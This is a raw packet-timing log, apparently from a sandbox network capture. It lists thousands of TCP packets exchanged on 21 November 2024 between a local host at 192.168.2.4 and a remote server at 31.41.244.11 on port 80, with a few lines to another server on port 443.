                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.606014967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.606065035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.606949091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.607048035 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.607137918 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.607196093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.608005047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.608073950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.608124018 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.608175993 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.609111071 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.609227896 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.609296083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.610181093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.610239983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.610280991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.610332966 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.611270905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.611342907 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.611388922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.611442089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.612344027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.612404108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.612463951 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.612514019 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.613481998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.613534927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.613610983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.614543915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.614603996 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.614665031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.614721060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.615672112 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.615739107 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.615789890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.615859985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.616707087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.616786957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.616853952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.616909027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.617795944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.617877960 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.617938995 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.618354082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.618892908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.618953943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.619024038 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.619087934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.619982004 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.620073080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.620153904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.620215893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.621072054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.621139050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.621202946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.621262074 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.622168064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.622236013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.622301102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.622359037 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.623231888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.623292923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.623389006 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.623450994 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.624332905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.624392033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.624473095 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.624536037 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.625415087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.625478983 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.625638008 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.625713110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.626491070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.626548052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.626626015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.626688957 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.627583027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.627646923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.627712965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.627774954 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.628737926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.628792048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.628798962 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.628859997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.629781961 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.629842043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.629905939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.629961967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.631289959 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.631320953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.631351948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.631386042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.631947041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.632019997 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.632035017 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.632085085 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.633049011 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.633109093 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.633228064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.633282900 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.634124994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.634180069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.634234905 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.634288073 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.635243893 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.635298967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.635343075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.635409117 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.636301041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.636431932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.636488914 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.637583971 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.637722015 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.637779951 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.638495922 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.638546944 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.694983006 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.695019007 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.792339087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.792393923 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.792515039 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.792773962 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.792833090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.793025970 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.793083906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.793118000 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.793175936 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.794061899 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.794121027 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.794205904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.794262886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.795257092 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.795319080 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.795391083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.795511961 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.796227932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.796287060 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.796351910 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.796401024 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.797355890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.797410965 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.797413111 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.797466040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.798490047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.798549891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.798652887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.798706055 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.799499035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.799565077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.799631119 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.799683094 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.800724030 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.800760984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.800795078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.800818920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.801676035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.801733971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.801768064 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.801937103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.802783012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.802838087 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.802839041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.802891016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.803930044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.803992987 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.804173946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.804662943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.804935932 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.805090904 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.806058884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.806096077 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.807142973 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.807346106 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.807359934 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.807399988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.808207035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.808264017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.808329105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.808392048 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.809371948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.809426069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.809441090 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.809478998 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.810400009 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.810458899 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.810504913 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.810556889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.811503887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.811553001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.811557055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.811609030 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.812586069 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.812638044 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.812683105 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.812728882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.813621998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.813678980 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.813716888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.813765049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.814735889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.814790964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.814815044 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.814882040 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.815803051 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.815851927 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.815891027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.815938950 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.816926003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.816982985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.817029953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.817090988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.817966938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.818013906 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.818109989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.818166971 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.819083929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.819133043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.819226027 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.819272041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.820143938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.820209026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.820274115 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.820322990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.821228981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.821289062 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.821329117 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.821374893 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.822329998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.822386026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.822424889 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.822478056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.823441982 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.823498964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.823543072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.823597908 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.824533939 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.824589968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.824634075 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.824708939 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.825614929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.825670958 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.825673103 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.825723886 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.826694012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.826746941 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.826791048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.826843977 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.827775955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.827828884 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.827876091 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.827927113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.828851938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.828901052 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.828970909 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.829015970 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.829962969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.830012083 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:18.830058098 CET804977031.41.244.11192.168.2.4
